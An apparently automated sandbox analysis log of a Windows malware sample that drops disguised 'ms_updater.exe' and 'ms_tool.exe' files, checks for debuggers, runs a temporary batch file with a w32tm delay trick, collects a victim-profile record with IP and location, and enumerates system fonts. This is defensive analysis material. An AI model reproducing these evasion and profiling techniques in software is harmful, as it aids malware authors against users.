                  Source: C:\Users\user\Desktop\1hibLFnCm1.exeCode function: 0_2_00F6CEEC mov eax, dword ptr fs:[00000030h]0_2_00F6CEEC
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exeCode function: 0_2_00F72D78 GetProcessHeap,0_2_00F72D78
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exeCode function: 0_2_00F5B991 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00F5B991
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exeCode function: 0_2_00F5BAF3 SetUnhandledExceptionFilter,0_2_00F5BAF3
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exeCode function: 0_2_00F61C34 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00F61C34
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exeCode function: 0_2_00F5BC05 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00F5BC05
                  Source: C:\Users\user\AppData\Roaming\ms_tool.exeCode function: 1_2_00007FF68C5E28E4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00007FF68C5E28E4
                  Source: C:\Users\user\AppData\Roaming\ms_tool.exeCode function: 1_2_00007FF68C5E2BE0 SetUnhandledExceptionFilter,1_2_00007FF68C5E2BE0
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeMemory allocated: page read and write | page guardJump to behavior
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exeProcess created: C:\Users\user\AppData\Roaming\ms_tool.exe "C:\Users\user\AppData\Roaming\ms_tool.exe" Jump to behavior
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exeProcess created: C:\Users\user\AppData\Roaming\ms_updater.exe "C:\Users\user\AppData\Roaming\ms_updater.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\jClCs9nEU3.bat" Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2Jump to behavior
                  Source: ms_updater.exe, 00000003.00000002.1759262008.00000000033A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: [{"Has Messengers (1153)":"N","Has Game Clients (1153)":"?","Has Media Clients (1153)":"?","Has FTP Clients (1153)":"?"},"5.0.1",5,0,"","user","364339","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\Users\\user\\AppData\\Roaming","Unknown (Unknown)","Unknown (Unknown)","Program Manager","8.46.123.33","US / United States of America","New York / New York City"," / "]
                  Source: ms_updater.exe, 00000003.00000002.1759262008.00000000033A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                  Source: ms_updater.exe, 00000003.00000002.1759262008.00000000033A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: known (Unknown)","Program Manager","8.46.123.33","US / United States of America","New York / New York City"," / "]
                  Source: ms_updater.exe, 00000003.00000002.1759262008.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, ms_updater.exe, 00000003.00000002.1759262008.0000000002FD1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager@}
                  Source: ms_updater.exe, 00000003.00000002.1759262008.00000000033A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager`
                  Source: ms_updater.exe, 00000003.00000002.1759262008.00000000033A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: [{"Has Messengers (1153)":"N","Has Game Clients (1153)":"?","Has Media Clients (1153)":"?","Has FTP Clients (1153)":"?"},"5.0.1",5,0,"","user","364339","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\Users\\user\\AppData\\Roaming","Unknown (Unknown)","Unknown (Unknown)","Program Manager","8.46.123.33","US / United States of America","New York / NewX
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exeCode function: 0_2_00F5B675 cpuid 0_2_00F5B675
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exeCode function: GetLocaleInfoW,0_2_00F72818
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,0_2_00F721B2
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00F72941
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exeCode function: GetLocaleInfoW,0_2_00F72A47
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exeCode function: EnumSystemLocalesW,0_2_00F6821E
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exeCode function: GetLocaleInfoW,0_2_00F723AD
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00F72B16
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exeCode function: EnumSystemLocalesW,0_2_00F7249F
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exeCode function: EnumSystemLocalesW,0_2_00F72454
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00F725C5
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exeCode function: EnumSystemLocalesW,0_2_00F7253A
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exeCode function: GetLocaleInfoW,0_2_00F68744
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Users\user\AppData\Roaming\ms_updater.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
